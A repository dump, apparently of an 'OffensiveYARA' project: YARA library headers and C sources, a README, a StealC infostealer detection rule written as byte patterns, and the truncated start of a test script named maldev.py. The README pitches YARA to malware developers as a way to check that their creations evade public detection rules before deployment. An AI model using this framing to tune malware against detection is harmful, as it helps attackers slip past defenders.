17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_PROC_H 31 | #define YR_PROC_H 32 | 33 | #include 34 | 35 | typedef struct _YR_PROC_ITERATOR_CTX 36 | { 37 | const uint8_t* buffer; 38 | size_t buffer_size; 39 | YR_MEMORY_BLOCK current_block; 40 | void* proc_info; 41 | } YR_PROC_ITERATOR_CTX; 42 | 43 | YR_API int yr_process_open_iterator( 44 | int pid, 45 | YR_MEMORY_BLOCK_ITERATOR* iterator); 46 | 47 | YR_API int yr_process_close_iterator(YR_MEMORY_BLOCK_ITERATOR* iterator); 48 | 49 | YR_API YR_MEMORY_BLOCK* yr_process_get_first_memory_block( 50 | YR_MEMORY_BLOCK_ITERATOR* iterator); 51 | 52 | YR_API YR_MEMORY_BLOCK* yr_process_get_next_memory_block( 53 | YR_MEMORY_BLOCK_ITERATOR* iterator); 54 | 55 | YR_API const uint8_t* yr_process_fetch_memory_block_data( 56 | YR_MEMORY_BLOCK* block); 57 | 58 | #endif 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Weaponizing YARA 2 | 3 | As we all know **YARA** ( language ) is a big thing in cyber security industry, it could be used as a tool for both side of the team. 
This project looks at YARA from an attacker's perspective:
> - Quality Assurance: malware developers can use YARA to check that their creations are not inadvertently detected by publicly available rules before deployment.
> - Code Reuse Identification: identifying reused code snippets from known malware to leverage existing techniques while avoiding detection.

From a **defensive** role perspective:
we develop rules for new threats, and they are deployed only after their quality has been proven through testing in our cloud and other environments.
These rules have been written by our threat analysts for threat hunters, incident responders, security analysts, and other defenders who could benefit from deploying high-quality threat detection YARA rules in their environment.

Our detection rules, as opposed to hunting rules, need to satisfy certain criteria to be eligible for deployment, namely:
* be as precise as possible, without losing detection quality
* aim to provide zero false-positive detections

In order for the rules to be easy to understand and maintain, we adopted the following set of goals:
> - clearly named byte patterns
> - readable and transparent conditions
> - match unique malware functionality
> - prefer code byte patterns over strings

To ensure the quality of our rules, we continuously and extensively test them in our cloud, on over 10B (and rising) unique binaries. Rules are evaluated on every layer to detect threats within layered objects, such as packed PE files, documents, and archives, among other things.
## Prerequisites
To successfully run the entire YARA rule set, you must have:
* YARA version 3.2.0
* PE and ELF modules enabled (the rules `import "pe"` and rely on fields such as `pe.entry_point`, so a build without the module will fail to compile them)

Contributors to OffensiveYARA:

[![](https://avatars.githubusercontent.com/u/1922788?s=50&v=4)](https://github.com/tpericin)
[![](https://avatars.githubusercontent.com/u/2851492?s=50&v=4)](https://github.com/Neo23x0)
[![](https://avatars.githubusercontent.com/u/182937?s=50&v=4)](https://github.com/plusvic)
[![](https://avatars.githubusercontent.com/u/24500615?s=50&v=4)](https://github.com/xbabka01)

## Originally based on
- [reversinglabs](https://github.com/reversinglabs/reversinglabs-yara-rules)
--------------------------------------------------------------------------------
/src/lib/modules/time/time.c:
--------------------------------------------------------------------------------
/*
Copyright (c) 2014-2017. The YARA Authors. All Rights Reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED.
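IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

#include
#include
#include <stdint.h>

#define MODULE_NAME time


// time.now(): the current calendar time as returned by time(), or undefined
// when time() reports failure.
define_function(now)
{
  time_t now = time(NULL);

  // time() signals failure with (time_t) -1.
  if (now == (time_t) -1)
    return_integer(YR_UNDEFINED);

  // Widen through int64_t rather than long: long is only 32 bits on some
  // 64-bit targets (LLP64 Windows), so the previous (long) cast truncated a
  // 64-bit time_t there and would wrap in 2038.
  return_integer((int64_t) now);
}


begin_declarations
  declare_function("now", "", "i", now);
end_declarations;


// No module-wide state to set up.
int module_initialize(YR_MODULE* module)
{
  return ERROR_SUCCESS;
}


// No module-wide state to tear down.
int module_finalize(YR_MODULE* module)
{
  return ERROR_SUCCESS;
}


// Nothing is computed per scan; now() reads the clock when it is called.
int module_load(
    YR_SCAN_CONTEXT* context,
    YR_OBJECT* module_object,
    void* module_data,
    size_t module_data_size)
{
  return ERROR_SUCCESS;
}


int module_unload(YR_OBJECT* module_object)
{
  return ERROR_SUCCESS;
}
--------------------------------------------------------------------------------
/src/lib/include/yara/stack.h:
--------------------------------------------------------------------------------
/*
Copyright (c) 2018. The YARA Authors. All Rights Reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.

2.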
Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_STACK_H 31 | #define YR_STACK_H 32 | 33 | typedef struct YR_STACK YR_STACK; 34 | 35 | struct YR_STACK 36 | { 37 | // Pointer to a heap-allocated array containing the void* values put in 38 | // in the stack. This array starts with a fixed size and it's grown as 39 | // required when new items are pushed into the stack. 40 | void* items; 41 | 42 | // Current capacity (i.e: the number of items that fit into the array) 43 | int capacity; 44 | 45 | // Size of each individual item in the stack. 46 | int item_size; 47 | 48 | // Index of the stack's top in the items array. 
49 | int top; 50 | }; 51 | 52 | int yr_stack_create(int initial_capacity, int item_size, YR_STACK** stack); 53 | 54 | void yr_stack_destroy(YR_STACK* stack); 55 | 56 | int yr_stack_push(YR_STACK* stack, void* item); 57 | 58 | int yr_stack_pop(YR_STACK* stack, void* item); 59 | 60 | #endif 61 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/helper.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 
*/

#ifndef AUTHENTICODE_PARSER_HELPER_H
#define AUTHENTICODE_PARSER_HELPER_H

#include
#include
#include
#include

#include

#ifdef _WIN32
// timegm() is not available on this platform; _mkgmtime is used as its
// UTC-to-epoch equivalent.
#define timegm _mkgmtime
#endif

#ifdef __cplusplus
extern "C" {
#endif

/* Endianity related functions for PE reading */
uint16_t bswap16(uint16_t d);
uint32_t bswap32(uint32_t d);

/* letoh* convert a little-endian on-disk value to host order, betoh* a
 * big-endian one. PE headers are little-endian, so on a big-endian host every
 * multi-byte header field must be read through letoh*. */
#if defined(WORDS_BIGENDIAN)
#define letoh16(x) bswap16(x)
#define letoh32(x) bswap32(x)
#define betoh16(x) (x)
#define betoh32(x) (x)
#else
#define letoh16(x) (x)
#define letoh32(x) (x)
#define betoh16(x) bswap16(x)
#define betoh32(x) bswap32(x)
#endif

/* Calculates digest md of data, return bytes written to digest or 0 on error
 * Maximum of EVP_MAX_MD_SIZE will be written to digest — so `digest` must
 * point to at least EVP_MAX_MD_SIZE bytes whatever md is, and a 0 return has
 * to be treated as failure rather than an empty digest. */
int calculate_digest(const EVP_MD* md, const uint8_t* data, size_t len, uint8_t* digest);
/* Copies data of length len into already existing arr
 * NOTE(review): len is a signed int; the implementation must reject negative
 * values before using it as a size — confirm in helper.c. */
int byte_array_init(ByteArray* arr, const uint8_t* data, int len);
/* Converts ASN1_TIME string time into a unix timestamp */
int64_t ASN1_TIME_to_int64_t(const ASN1_TIME* time);

#ifdef __cplusplus
}
#endif

#endif
--------------------------------------------------------------------------------
/src/lib/include/yara/pe_utils.h:
--------------------------------------------------------------------------------
#ifndef YR_PE_UTILS_H
#define YR_PE_UTILS_H

#include

// Upper bound on sections the parser will walk; NOTE(review): presumably
// mirrors the limit enforced by the Windows loader — confirm before changing.
#define MAX_PE_SECTIONS 96

// Reads Magic through the header64 view regardless of the file's bitness.
// This relies on header/header64 sharing storage (see the union in PE) and on
// Magic sitting at the same offset in both optional-header layouts. The caller
// must already have bounds-checked the NT headers against the buffer.
#define IS_64BITS_PE(pe) \
  (yr_le16toh(pe->header64->OptionalHeader.Magic) == \
   IMAGE_NT_OPTIONAL_HDR64_MAGIC)

// Selects the 32- or 64-bit optional-header field by the Magic value.
#define OptionalHeader(pe, field) \
  (IS_64BITS_PE(pe) ? pe->header64->OptionalHeader.field \
                    : pe->header->OptionalHeader.field)

//
// Imports are stored in a linked list.
// Each node (IMPORTED_DLL) contains the
// name of the DLL and a pointer to another linked list of
// IMPORT_FUNCTION structures containing the details of imported
// functions.
//

typedef struct _IMPORTED_DLL
{
  char* name;  // DLL name; who allocates/frees it is not visible here

  struct _IMPORT_FUNCTION* functions;  // head of this DLL's function list
  struct _IMPORTED_DLL* next;          // next DLL, NULL-terminated presumably

} IMPORTED_DLL, *PIMPORTED_DLL;

//
// This is used to track imported and exported functions. The "has_ordinal"
// field is only used in the case of imports as those are optional. Every export
// has an ordinal so we don't need the field there, but in the interest of
// keeping duplicate code to a minimum we use this structure for both imports
// and exports.
//

typedef struct _IMPORT_FUNCTION
{
  char* name;
  uint8_t has_ordinal;  // imports only: non-zero when `ordinal` is meaningful
  uint16_t ordinal;
  uint64_t rva;         // relative virtual address (see pe_rva_to_offset)

  struct _IMPORT_FUNCTION* next;

} IMPORT_FUNCTION, *PIMPORT_FUNCTION;

typedef struct _PE
{
  // The raw file bytes being parsed and their length. Every bounds check in
  // fits_in_pe below is expressed relative to this pair.
  const uint8_t* data;
  size_t data_size;

  // Both members alias the same bytes; IS_64BITS_PE (above in this header)
  // decides which view is the valid one for this file.
  union
  {
    PIMAGE_NT_HEADERS32 header;
    PIMAGE_NT_HEADERS64 header64;
  };

  YR_HASH_TABLE* hash_table;
  YR_OBJECT* object;
  IMPORTED_DLL* imported_dlls;        // regular import table
  IMPORTED_DLL* delay_imported_dlls;  // delay-load import table

  // Presumably running counts of parsed resources / version-info entries —
  // confirm in pe.c.
  uint32_t resources;
  uint32_t version_infos;

} PE;

// Bounds check to run before reading `size` bytes at `pointer` from the mapped
// file. All three conditions matter: the first also guarantees that
// `pe->data_size - (size)` cannot wrap (a negative `size` cast to size_t is
// rejected there too), the other two keep [pointer, pointer + size] inside
// [pe->data, pe->data + pe->data_size]. `pointer` and `size` are each
// evaluated more than once, so arguments with side effects are unsafe here.
#define fits_in_pe(pe, pointer, size) \
  ((size_t)(size) <= pe->data_size && (uint8_t*) (pointer) >= pe->data && \
   (uint8_t*) (pointer) <= pe->data + pe->data_size - (size))

// Convenience form of fits_in_pe for a whole struct at `pointer`.
#define struct_fits_in_pe(pe, pointer, struct_type) \
  fits_in_pe(pe, pointer, sizeof(struct_type))

// Locates the NT headers inside `data`; presumably returns NULL when `data`
// is not a PE image — confirm in pe_utils.c.
PIMAGE_NT_HEADERS32 pe_get_header(const uint8_t* data, size_t data_size);

PIMAGE_DATA_DIRECTORY pe_get_directory_entry(PE* pe, int entry);

// Maps an RVA to a file offset; a negative result presumably signals an RVA
// that falls in no section — confirm in pe_utils.c.
int64_t pe_rva_to_offset(PE* pe, uint64_t rva);

// Resolves an import by ordinal for the named DLL. `dll` is not const here
// although nothing in this header suggests it is modified.
char* ord_lookup(char* dll, uint16_t ord);

#endif
-------------------------------------------------------------------------------- /src/lib/include/yara/threading.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2016. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
28 | */ 29 | 30 | #ifndef YR_MUTEX_H 31 | #define YR_MUTEX_H 32 | 33 | #if defined(_WIN32) || defined(__CYGWIN__) 34 | 35 | #include 36 | 37 | typedef DWORD YR_THREAD_ID; 38 | typedef DWORD YR_THREAD_STORAGE_KEY; 39 | typedef HANDLE YR_MUTEX; 40 | 41 | #define YR_TLS __declspec(thread) 42 | 43 | #else 44 | 45 | #include 46 | 47 | typedef pthread_t YR_THREAD_ID; 48 | typedef pthread_key_t YR_THREAD_STORAGE_KEY; 49 | typedef pthread_mutex_t YR_MUTEX; 50 | 51 | #define YR_TLS __thread 52 | 53 | #endif 54 | 55 | YR_THREAD_ID yr_current_thread_id(void); 56 | 57 | int yr_mutex_create(YR_MUTEX*); 58 | int yr_mutex_destroy(YR_MUTEX*); 59 | int yr_mutex_lock(YR_MUTEX*); 60 | int yr_mutex_unlock(YR_MUTEX*); 61 | 62 | int yr_thread_storage_create(YR_THREAD_STORAGE_KEY*); 63 | int yr_thread_storage_destroy(YR_THREAD_STORAGE_KEY*); 64 | int yr_thread_storage_set_value(YR_THREAD_STORAGE_KEY*, void*); 65 | void* yr_thread_storage_get_value(YR_THREAD_STORAGE_KEY*); 66 | 67 | #endif 68 | -------------------------------------------------------------------------------- /src/lib/include/yara/stopwatch.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2017. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 
17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_STOPWATCH_H 31 | #define YR_STOPWATCH_H 32 | 33 | #include 34 | #include 35 | 36 | #if defined(_WIN32) 37 | 38 | #include 39 | 40 | typedef struct _YR_STOPWATCH 41 | { 42 | LARGE_INTEGER frequency; 43 | LARGE_INTEGER start; 44 | 45 | } YR_STOPWATCH; 46 | 47 | #elif defined(__APPLE__) && defined(__MACH__) 48 | 49 | #include 50 | 51 | typedef struct _YR_STOPWATCH 52 | { 53 | mach_timebase_info_data_t timebase; 54 | uint64_t start; 55 | 56 | } YR_STOPWATCH; 57 | 58 | #else 59 | 60 | #include 61 | 62 | typedef struct _YR_STOPWATCH 63 | { 64 | union 65 | { 66 | struct timeval tv_start; 67 | struct timespec ts_start; 68 | }; 69 | 70 | } YR_STOPWATCH; 71 | 72 | #endif 73 | 74 | // yr_stopwatch_start starts measuring time. 75 | void yr_stopwatch_start(YR_STOPWATCH* stopwatch); 76 | 77 | // yr_stopwatch_elapsed_ns returns the number of nanoseconds elapsed 78 | // since the last call to yr_stopwatch_start. 
79 | uint64_t yr_stopwatch_elapsed_ns(YR_STOPWATCH* stopwatch); 80 | 81 | #endif 82 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/helper.c: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 
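*/

#include "helper.h"

/* Headers restored from the uses below: EVP_* and ASN1_TIME_to_tm (OpenSSL),
 * malloc, memcpy/memset, struct tm/timegm and the fixed-width types. */
#include <openssl/asn1.h>
#include <openssl/evp.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Swaps the two bytes of d. */
uint16_t bswap16(uint16_t d)
{
    /* d is promoted to int for the shifts; the cast truncates back to 16 bits. */
    return (uint16_t)((d << 8) | (d >> 8));
}

/* Reverses the byte order of d. */
uint32_t bswap32(uint32_t d)
{
    return ((d & 0xff000000u) >> 24) | ((d & 0x00ff0000u) >> 8) | ((d & 0x0000ff00u) << 8) |
           ((d & 0x000000ffu) << 24);
}

/* Computes the digest md over len bytes of data into digest.
 * Returns the number of bytes written to digest, or 0 on any failure
 * (context allocation, init, update or final). At most EVP_MAX_MD_SIZE bytes
 * are written, so the caller must provide at least that much room. */
int calculate_digest(const EVP_MD* md, const uint8_t* data, size_t len, uint8_t* digest)
{
    unsigned int outLen = 0;

    EVP_MD_CTX* mdCtx = EVP_MD_CTX_new();
    if (!mdCtx)
        return 0;

    if (!EVP_DigestInit_ex(mdCtx, md, NULL) || !EVP_DigestUpdate(mdCtx, data, len) ||
        !EVP_DigestFinal_ex(mdCtx, digest, &outLen)) {
        /* Never report a length for a digest that was not fully produced. */
        outLen = 0;
    }

    EVP_MD_CTX_free(mdCtx);
    return (int)outLen;
}

/* Copies len bytes of data into a freshly malloc'd buffer owned by arr.
 * arr itself must already exist. On success returns 0 with arr->data/arr->len
 * set (NULL/0 when len is 0). Returns -1 when arr is NULL, len is negative,
 * data is NULL while len > 0, or allocation fails; in those cases arr (if
 * non-NULL) is left as an empty array so a later free(arr->data) is safe. */
int byte_array_init(ByteArray* arr, const uint8_t* data, int len)
{
    if (!arr)
        return -1;

    arr->data = NULL;
    arr->len = 0;

    /* A negative len would become a huge size_t in malloc/memcpy; a NULL data
     * with a positive len would make memcpy read through NULL. */
    if (len < 0 || (len > 0 && data == NULL))
        return -1;

    if (len == 0)
        return 0;

    uint8_t* copy = malloc((size_t)len);
    if (!copy)
        return -1;

    memcpy(copy, data, (size_t)len);
    arr->data = copy;
    arr->len = len;
    return 0;
}

/* Converts an ASN1_TIME to seconds since the Unix epoch, interpreting the
 * broken-down time as UTC (timegm). A NULL time, or one that
 * ASN1_TIME_to_tm() cannot parse, yields timegm() of an all-zero struct tm;
 * the two cases are therefore indistinguishable to the caller. */
int64_t ASN1_TIME_to_int64_t(const ASN1_TIME* time)
{
    struct tm t = {0};

    if (time && !ASN1_TIME_to_tm(time, &t)) {
        /* ASN1_TIME_to_tm() may have partially filled t before failing;
         * fall back to the same "unset" value as the NULL case. */
        memset(&t, 0, sizeof t);
    }

    return (int64_t)timegm(&t);
}

-------------------------------------------------------------------------------- /src/exp/infostealer/Win32.Infostealer.StealC.yara: --------------------------------------------------------------------------------
rule Win32_Infostealer_StealC : tc_detection malicious
{
    meta:

        author = "ReversingLabs"

        source = "ReversingLabs"
        status = "RELEASED"
        sharing = "TLP:WHITE"
        category = "MALWARE"
        malware = "STEALC"
        description = "Yara rule that detects StealC infostealer."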
13 | 14 | tc_detection_type = "Infostealer" 15 | tc_detection_name = "StealC" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $resolve_windows_api = { 21 | 55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ?? 22 | 89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? 23 | ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 24 | } 25 | 26 | $load_sqlite3_functions = { 27 | 55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D 28 | 45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ?? 29 | B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70 30 | ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 31 | ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 32 | A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? 33 | ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 34 | } 35 | 36 | $check_license_expiration_date = { 37 | 55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB 38 | AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24 39 | ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D 40 | 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 41 | 8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 42 | 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ?? 43 | 8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 
5F 8B E5 5D C3 44 | } 45 | 46 | condition: 47 | uint16(0) == 0x5A4D and 48 | ( 49 | $resolve_windows_api 50 | ) and 51 | ( 52 | $load_sqlite3_functions 53 | ) and 54 | ( 55 | $check_license_expiration_date 56 | ) 57 | } -------------------------------------------------------------------------------- /tests/maldev.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import psutil 3 | import base64 4 | import time 5 | import gzip 6 | import os 7 | 8 | def main(): 9 | # fork a child process 10 | pid = os.fork() 11 | 12 | if pid > 0: 13 | # parent process 14 | while True: 15 | # percentage of used CPU 16 | cpu = psutil.cpu_percent() 17 | # percentage of used RAM 18 | ram = psutil.virtual_memory().percent 19 | # percentage of used disk space 20 | disk = psutil.disk_usage("/").percent 21 | # number of all running processes 22 | processes_count = 0 23 | for _ in psutil.process_iter(): 24 | processes_count += 1 25 | 26 | # print to screen 27 | print("---------------------------------------------------------") 28 | print("| CPU USAGE | RAM 